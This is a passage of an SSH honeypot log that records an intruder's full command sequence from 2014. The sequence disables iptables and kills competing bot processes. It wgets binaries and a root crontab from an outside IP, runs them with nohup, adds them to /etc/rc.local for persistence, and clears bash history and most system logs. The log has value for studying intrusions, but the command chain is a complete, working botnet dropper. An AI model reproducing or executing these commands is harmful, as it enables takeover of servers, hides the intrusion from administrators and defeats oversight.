2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c " 2014-11-02 04:36:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] CMD: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd. cd /etc;rm -rf dir atddd. cd /etc;rm -rf dir ksapdd. cd /etc;rm -rf dir kysapdd. cd /etc;rm -rf dir sksapdd. cd /etc;rm -rf dir skysapdd. cd /etc;rm -rf dir xfsdxd. cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd. cd /etc;rm -rf dir atdd. cd /etc;rm -rf dir ksapd. cd /etc;rm -rf dir kysapd. cd /etc;rm -rf dir sksapd. cd /etc;rm -rf dir skysapd. cd /etc;rm -rf dir xfsdx. cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs. cd /etc;rm -rf dir gfhjrtfyhuf. cd /etc;rm -rf dir rewgtf3er4t. cd /etc;rm -rf dir fdsfsfvff. cd /etc;rm -rf dir smarvtd. cd /etc;rm -rf dir whitptabil. cd /etc;rm -rf dir gdmorpen. cd /etc;rm -rf dir nhgbhhj. cd /tmp;rm -rf dir 1. cd /tmp;rm -rf dir 2. cd /tmp;rm -rf dir 3. cd /tmp;rm -rf dir 4. cd /tmp;rm -rf dir 5. cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe. cd /var/spool/cron; rm -rf dir root. cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root. cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://219.135.56.167:9162/root cd /var/spool/cron/crontabs ;wget -c http://219.135.56.167:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://219.135.56.167:9162/jdhe cd /etc;wget -c http://219.135.56.167:9162/sfewfesfs cd /etc;wget -c http://219.135.56.167:9162/gfhjrtfyhuf cd /etc;wget -c http://219.135.56.167:9162/rewgtf3er4t cd /etc;wget -c http://219.135.56.167:9162/fdsfsfvff cd /etc;wget -c http://219.135.56.167:9162/smarvtd cd /etc;wget -c http://219.135.56.167:9162/whitptabil cd /etc;wget -c http://219.135.56.167:9162/gdmorpen cd /etc;wget -c http://219.135.56.167:9162/nhgbhhj cd /etc;wget -c http://219.135.56.167:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c
2014-11-02 04:36:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] Command not found: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc 2014-11-02 04:36:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] Command found: rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT k 2014-11-02 04:36:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] sending close 0 2014-11-02 04:36:15+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,122.225.97.106] remote close 2014-11-02 04:36:15+0000 [HoneyPotTransport,107,122.225.97.106] connection lost